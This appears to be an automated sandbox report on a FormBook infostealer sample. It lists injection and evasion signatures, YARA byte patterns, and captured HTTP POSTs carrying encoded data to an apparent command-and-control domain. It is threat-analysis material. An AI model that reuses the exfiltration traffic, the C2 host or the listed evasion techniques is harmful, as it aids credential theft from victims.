Play interactive tourEdit tour

# Analysis Report Dgslimt_Signed_.exe

## Overview

### General Information

 Sample Name: Dgslimt_Signed_.exe Analysis ID: 254519 MD5: 738cd543912792b376d1a444c01f2a13 SHA1: 9de5396ba7bbb9b413df229948c63dad75cbebf0 SHA256: a678db2b0d3f84a7edaa2c100192a43397a7be3d2c482b34d7bdaf1572f00720 Most interesting Screenshot:

### Detection

FormBook
 Score: 100 Range: 0 - 100 Whitelisted: false Confidence: 100%

### Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains strange resources
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

### Classification

 System is w10x64Dgslimt_Signed_.exe (PID: 6600 cmdline: 'C:\Users\user\Desktop\Dgslimt_Signed_.exe' MD5: 738CD543912792B376D1A444C01F2A13)ieinstal.exe (PID: 7036 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)explorer.exe (PID: 3508 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)NETSTAT.EXE (PID: 5568 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)ieinstal.exe (PID: 4960 cmdline: 'C:\Program Files (x86)\internet explorer\ieinstal.exe' MD5: DAD17AB737E680C47C8A44CBB95EE67E)ieinstal.exe (PID: 6672 cmdline: 'C:\Program Files (x86)\internet explorer\ieinstal.exe' MD5: DAD17AB737E680C47C8A44CBB95EE67E)cleanup

## Malware Configuration

No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Dgsllll[1]SUSP_Reversed_Base64_Encoded_EXEDetects an base64 encoded executable with reversed charactersFlorian Roth
• 0x5d56f:$s4: AEAAAAIAAQpVT • 0x7ca9f:$s4: AEAAAAIAAQpVT
SourceRuleDescriptionAuthorStrings
00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00 00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group • 0x18449:$sqlite3step: 68 34 1C 7B E1
• 0x1855c:$sqlite3step: 68 34 1C 7B E1 • 0x18478:$sqlite3text: 68 38 2A 90 C5
• 0x1859d:$sqlite3text: 68 38 2A 90 C5 • 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
• 0x185b3:$sqlite3blob: 68 53 D8 7F 8C 0000000F.00000002.506448280.00000000001E0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security 0000000F.00000002.506448280.00000000001E0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4 • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Click to see the 21 entries
SourceRuleDescriptionAuthorStrings
4.2.ieinstal.exe.10410000.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
4.2.ieinstal.exe.10410000.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00 4.2.ieinstal.exe.10410000.3.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group • 0x18449:$sqlite3step: 68 34 1C 7B E1
• 0x1855c:$sqlite3step: 68 34 1C 7B E1 • 0x18478:$sqlite3text: 68 38 2A 90 C5
• 0x1859d:$sqlite3text: 68 38 2A 90 C5 • 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
• 0x185b3:$sqlite3blob: 68 53 D8 7F 8C 4.2.ieinstal.exe.10410000.3.unpackJoeSecurity_FormBookYara detected FormBookJoe Security 4.2.ieinstal.exe.10410000.3.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com • 0x8ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x8d32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC • 0x149c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x144b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 • 0x14ac7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x14c3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 • 0x98ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x1372c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 • 0xa5b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x19d37:$sequence_8: 3C 54 74 04 3C 74 75 F4 • 0x1ad3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Click to see the 1 entries

## Sigma Overview

No Sigma rule has matched

## Signature Overview

### AV Detection:

 Yara detected FormBook Show sources
 Source: Yara match File source: 00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.506448280.00000000001E0000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.509897320.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.351123790.0000000003830000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.354123960.0000000010410000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 4.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 4.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE
 Machine Learning detection for sample Show sources
 Source: Dgslimt_Signed_.exe Joe Sandbox ML: detected

### Networking:

 Uses netstat to query active network connections and open ports Show sources
 Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
 HTTP GET or POST without a user agent Show sources
 Source: global traffic HTTP traffic detected: GET /m3px/?RL=4MyE+CpeL4Pkxg37nk0WDQpTsr14l9AWoSemyB7rAQ1tkLL6mKl4JYswWkNQaMP7Hy1d&Rf=hd8d5zxpJVY HTTP/1.1Host: www.thedraftmedic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Uses a known web browser user agent for HTTP communication Show sources
 Source: global traffic HTTP traffic detected: POST /m3px/ HTTP/1.1Host: www.thedraftmedic.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.thedraftmedic.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thedraftmedic.com/m3px/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 52 4c 3d 77 75 7e 2d 67 6d 45 70 57 34 44 55 78 33 43 6d 34 30 46 77 44 41 6c 39 74 5a 41 75 79 38 73 77 30 56 50 48 72 53 57 38 4f 79 64 68 72 59 72 5f 33 36 51 36 61 49 74 48 55 6d 52 53 61 64 4c 56 59 77 34 4e 65 64 47 30 46 7a 4d 50 34 47 7a 49 57 35 54 36 28 51 35 59 71 38 49 76 68 78 35 51 5a 6c 47 31 6f 67 6d 68 39 52 28 72 58 6c 38 72 39 37 30 44 55 6e 75 37 28 56 75 66 55 6d 52 74 79 44 4a 6a 74 32 57 45 4f 33 6f 68 64 46 30 35 6d 76 61 4d 64 34 55 47 72 75 66 61 41 70 65 41 4a 33 79 4d 30 44 71 33 6d 50 7e 49 4e 6e 68 55 52 61 67 63 6d 47 47 78 6f 6d 32 75 6d 34 36 68 47 64 63 45 59 70 4b 51 72 6b 38 66 36 4e 66 58 56 68 35 34 31 45 6b 65 70 79 39 61 35 45 72 4c 46 74 6b 37 38 34 56 73 72 30 50 31 5a 74 6a 34 4a 72 77 63 53 31 47 50 32 36 54 6e 30 57 4c 53 47 31 76 46 54 47 66 47 75 52 57 6d 32 53 4e 59 31 78 75 36 69 70 58 41 45 69 62 4e 77 32 6f 4d 79 70 61 7a 66 69 78 50 50 74 71 66 66 4f 30 7a 51 71 48 65 44 62 63 65 6d 34 4d 47 49 74 71 6b 77 65 71 58 6d 78 73 55 37 42 30 5f 47 33 4b 43 47 71 4c 54 48 4c 61 30 45 7a 47 6e 74 48 62 68 59 46 76 36 37 33 4a 4a 7e 70 42 51 5a 33 49 70 57 49 70 4a 31 64 70 4c 61 6c 5a 30 4e 6e 39 44 43 77 75 44 6d 62 37 44 36 55 61 54 6a 61 37 53 28 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: RL=wu~-gmEpW4DUx3Cm40FwDAl9tZAuy8sw0VPHrSW8OydhrYr_36Q6aItHUmRSadLVYw4NedG0FzMP4GzIW5T6(Q5Yq8Ivhx5QZlG1ogmh9R(rXl8r970DUnu7(VufUmRtyDJjt2WEO3ohdF05mvaMd4UGrufaApeAJ3yM0Dq3mP~INnhURagcmGGxom2um46hGdcEYpKQrk8f6NfXVh541Ekepy9a5ErLFtk784Vsr0P1Ztj4JrwcS1GP26Tn0WLSG1vFTGfGuRWm2SNY1xu6ipXAEibNw2oMypazfixPPtqffO0zQqHeDbcem4MGItqkweqXmxsU7B0_G3KCGqLTHLa0EzGntHbhYFv673JJ~pBQZ3IpWIpJ1dpLalZ0Nn9DCwuDmb7D6UaTja7S(w). Source: global traffic HTTP traffic detected: POST /m3px/ HTTP/1.1Host: www.thedraftmedic.comConnection: closeContent-Length: 167132Cache-Control: no-cacheOrigin: http://www.thedraftmedic.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thedraftmedic.com/m3px/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 52 4c 3d 77 75 7e 2d 67 69 52 51 46 59 57 61 6d 79 79 6e 34 6b 31 6f 56 30 68 6a 36 4f 52 79 6c 38 55 43 39 69 28 58 72 53 4b 77 47 51 6c 73 68 59 62 5f 6a 49 34 39 42 59 74 41 46 57 52 52 65 64 33 48 48 7a 6f 56 65 5a 57 4b 46 7a 45 41 74 56 37 4a 59 4a 54 54 77 51 6c 4f 37 4d 63 34 68 79 4e 35 59 42 6a 6f 76 67 71 68 7a 42 33 6c 5a 6b 73 77 36 35 51 47 54 6e 6a 7a 39 52 71 61 55 56 6b 45 78 68 31 56 71 33 36 47 4a 45 31 74 52 6b 6b 42 78 6f 4f 4a 54 49 41 4e 6b 4e 6a 4a 45 49 43 45 4b 32 7a 73 6f 54 47 77 6c 5f 6d 47 62 30 6f 72 55 72 55 70 6c 57 57 44 6f 6e 75 59 76 75 36 38 43 65 34 63 61 38 69 75 6a 78 63 52 77 63 66 31 52 6e 4e 76 6c 33 38 68 6b 54 4e 42 39 56 47 52 45 76 74 6d 7a 35 38 55 6f 42 33 35 52 38 54 71 4b 36 30 55 4e 6c 57 67 78 39 4f 2d 7e 6e 72 61 56 41 33 6e 63 47 65 51 39 42 57 71 34 41 31 4b 78 41 71 78 31 49 48 2d 46 68 37 52 6e 56 74 72 7a 76 58 69 61 47 38 54 49 59 4f 44 55 65 6b 4c 56 4b 4c 56 43 49 41 74 76 59 4e 58 43 49 33 6f 77 65 71 62 6d 7a 56 4a 37 31 63 5f 48 6c 53 76 47 4e 33 6c 4d 72 61 31 49 44 57 6c 6d 58 6e 78 59 42 44 36 37 48 5a 6a 34 61 68 51 4f 78 73 6f 57 70 70 4a 79 74 70 4c 63 6c 59 48 46 57 38 72 55 68 33 30 75 49 76 41 7a 68 6a 33 75 5a 6d 41 6b 59 47 31 55 76 31 46 72 33 56 41 54 4c 5a 59 64 5f 38 46 43 4e 43 68 70 64 75 4d 75 71 48 4b 57 59 68 65 36 63 74 6b 74 48 45 4f 72 59 57 46 57 46 42 68 78 45 30 58 6b 46 66 71 55 33 66 2d 4f 6d 6d 46 71 6d 44 74 79 70 76 57 46 34 55 55 53 34 46 67 38 65 70 66 45 76 67 55 51 2d 67 4a 67 4c 4c 59 6d 6d 48 32 37 5f 6f 75 57 32 32 46 74 6e 70 2d 71 6f 4c 52 38 52 6e 67 64 4a 65 63 4b 61 7a 4c 54 52 4b 52 69 52 44 72 76 68 50 63 74 4b 6c 53 54 4b 4d 47 78 45 4c 4a 66 34 45 79 55 34 41 42 6d 62 76 78 58 4d 4a 46 4e 4e 47 4f 37 33 6d 75 6e 46 53 31 4a 42 76 34 4b 77 45 6a 68 71 34 64 6a 4d 6e 45 47 6c 4d 34 77 74 7a 41 7a 78 50 34 48 36 49 6c 61 50 33 50 7a 49 42 77 6a 58 53 37 68 69 39 7a 4e 34 62 6e 59 38 50 6e 49 32 6f 52 6e 42 6b 42 73 73 6a 51 78 65 67 69 31 58 51 63 28 4d 30 5f 30 5a 51 57 61 45 38 75 6e 4e 43 4f 69 31 45 43 54 71 28 30 31 6f 77 58 47 52 70 48 66 50 54 55 54 62 78 65 6b 64 65 65 34 31 55 7a 58 51 35 31 73 6f 63 56 61 70 4b 6f 57 38 77 33 59 79 4c 75 74 77 79 4d 4c 36 39 61 6e 56 61 4c 63 33 39 38 64 4c 4b 74 64 54 6f 54 4d 65 50 43 34 72 44 41 35 46 45 4b 32 46 32 55 4a 67 72 75 6c 6b 6a 64 52 6f 33 77 4e 48 57 77 75 35 72 79 45 54 5a 46 44 44 58 53 75 55 39 2d 38 36 4e 59 37 76 61 55 6b 78 61 59 67 4a 53 66 52 33 56 6e 6c 75 44 4d 67 6d 7e 45 55 34 61 4e 4f 64 69 6a 65 47 4d 2d 39 61 47 78 48 33 53 43 45 4b 73 77 70 79 76 7a 57 77
 Source: global traffic HTTP traffic detected: GET /m3px/?RL=4MyE+CpeL4Pkxg37nk0WDQpTsr14l9AWoSemyB7rAQ1tkLL6mKl4JYswWkNQaMP7Hy1d&Rf=hd8d5zxpJVY HTTP/1.1Host: www.thedraftmedic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Found strings which match to known social media urls Show sources
 Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.facebook.com/favicon.ico equals www.facebook.com (Facebook) Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico equals www.myspace.com (Myspace) Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico equals www.rambler.ru (Rambler) Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook) Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/ equals www.rambler.ru (Rambler)
 Performs DNS lookups Show sources
 Source: unknown DNS traffic detected: queries for: cdn.discordapp.com
 Posts data to webserver Show sources
 Source: unknown HTTP traffic detected: POST /m3px/ HTTP/1.1Host: www.thedraftmedic.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.thedraftmedic.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thedraftmedic.com/m3px/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 52 4c 3d 77 75 7e 2d 67 6d 45 70 57 34 44 55 78 33 43 6d 34 30 46 77 44 41 6c 39 74 5a 41 75 79 38 73 77 30 56 50 48 72 53 57 38 4f 79 64 68 72 59 72 5f 33 36 51 36 61 49 74 48 55 6d 52 53 61 64 4c 56 59 77 34 4e 65 64 47 30 46 7a 4d 50 34 47 7a 49 57 35 54 36 28 51 35 59 71 38 49 76 68 78 35 51 5a 6c 47 31 6f 67 6d 68 39 52 28 72 58 6c 38 72 39 37 30 44 55 6e 75 37 28 56 75 66 55 6d 52 74 79 44 4a 6a 74 32 57 45 4f 33 6f 68 64 46 30 35 6d 76 61 4d 64 34 55 47 72 75 66 61 41 70 65 41 4a 33 79 4d 30 44 71 33 6d 50 7e 49 4e 6e 68 55 52 61 67 63 6d 47 47 78 6f 6d 32 75 6d 34 36 68 47 64 63 45 59 70 4b 51 72 6b 38 66 36 4e 66 58 56 68 35 34 31 45 6b 65 70 79 39 61 35 45 72 4c 46 74 6b 37 38 34 56 73 72 30 50 31 5a 74 6a 34 4a 72 77 63 53 31 47 50 32 36 54 6e 30 57 4c 53 47 31 76 46 54 47 66 47 75 52 57 6d 32 53 4e 59 31 78 75 36 69 70 58 41 45 69 62 4e 77 32 6f 4d 79 70 61 7a 66 69 78 50 50 74 71 66 66 4f 30 7a 51 71 48 65 44 62 63 65 6d 34 4d 47 49 74 71 6b 77 65 71 58 6d 78 73 55 37 42 30 5f 47 33 4b 43 47 71 4c 54 48 4c 61 30 45 7a 47 6e 74 48 62 68 59 46 76 36 37 33 4a 4a 7e 70 42 51 5a 33 49 70 57 49 70 4a 31 64 70 4c 61 6c 5a 30 4e 6e 39 44 43 77 75 44 6d 62 37 44 36 55 61 54 6a 61 37 53 28 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: RL=wu~-gmEpW4DUx3Cm40FwDAl9tZAuy8sw0VPHrSW8OydhrYr_36Q6aItHUmRSadLVYw4NedG0FzMP4GzIW5T6(Q5Yq8Ivhx5QZlG1ogmh9R(rXl8r970DUnu7(VufUmRtyDJjt2WEO3ohdF05mvaMd4UGrufaApeAJ3yM0Dq3mP~INnhURagcmGGxom2um46hGdcEYpKQrk8f6NfXVh541Ekepy9a5ErLFtk784Vsr0P1Ztj4JrwcS1GP26Tn0WLSG1vFTGfGuRWm2SNY1xu6ipXAEibNw2oMypazfixPPtqffO0zQqHeDbcem4MGItqkweqXmxsU7B0_G3KCGqLTHLa0EzGntHbhYFv673JJ~pBQZ3IpWIpJ1dpLalZ0Nn9DCwuDmb7D6UaTja7S(w).
 Urls found in memory or binary data Show sources
 Uses HTTPS Show sources
 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722 Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443

### E-Banking Fraud:

 Yara detected FormBook Show sources
 Source: Yara match File source: 00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.506448280.00000000001E0000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.509897320.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.351123790.0000000003830000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.354123960.0000000010410000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 4.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 4.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE

### System Summary:

 Detected FormBook malware Show sources
 Malicious sample detected (through community Yara rule) Show sources
 Source: 00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000F.00000002.506448280.00000000001E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000F.00000002.506448280.00000000001E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000F.00000002.509897320.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000F.00000002.509897320.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000004.00000002.351123790.0000000003830000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000004.00000002.351123790.0000000003830000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000004.00000002.354123960.0000000010410000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000004.00000002.354123960.0000000010410000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 4.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 4.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 4.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 4.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Contains functionality to call native functions Show sources
 Detected potential crypto function Show sources
 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_05441D55 4_2_05441D55 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_05370D20 4_2_05370D20 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_05442D07 4_2_05442D07 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_054425DD 4_2_054425DD Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_053A2581 4_2_053A2581 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_0538D5E0 4_2_0538D5E0 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_0543D466 4_2_0543D466 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_0538841F 4_2_0538841F Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_0544DFCE 4_2_0544DFCE Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_05441FF1 4_2_05441FF1 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_05396E30 4_2_05396E30 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_0543D616 4_2_0543D616 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_05442EF7 4_2_05442EF7 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_05394120 4_2_05394120 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_0537F900 4_2_0537F900 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_05431002 4_2_05431002 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_0544E824 4_2_0544E824 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_053A20A0 4_2_053A20A0 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_0538B090 4_2_0538B090 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_054428EC 4_2_054428EC Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_054420A8 4_2_054420A8 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_05442B28 4_2_05442B28 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_053AEBB0 4_2_053AEBB0 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_0543DBD2 4_2_0543DBD2 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_054303DA 4_2_054303DA Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_054422AE 4_2_054422AE Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_1042D032 4_2_1042D032 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_10411030 4_2_10411030 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_1042E100 4_2_1042E100 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_10412D8C 4_2_10412D8C Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_10412D90 4_2_10412D90 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_1042CE00 4_2_1042CE00 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_1042CF4F 4_2_1042CF4F Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_10419F7B 4_2_10419F7B Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_10419F80 4_2_10419F80 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_10412FB0 4_2_10412FB0 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_1042C7B3 4_2_1042C7B3 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 15_2_02DD9F80 15_2_02DD9F80 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 15_2_02DD2FB0 15_2_02DD2FB0 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 15_2_02DD9F7B 15_2_02DD9F7B Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 15_2_02DD2D90 15_2_02DD2D90 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 15_2_02DD2D8C 15_2_02DD2D8C
 Found potential string decryption / allocating functions Show sources
 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 0537B150 appears 45 times
 PE / OLE file has an invalid certificate Show sources
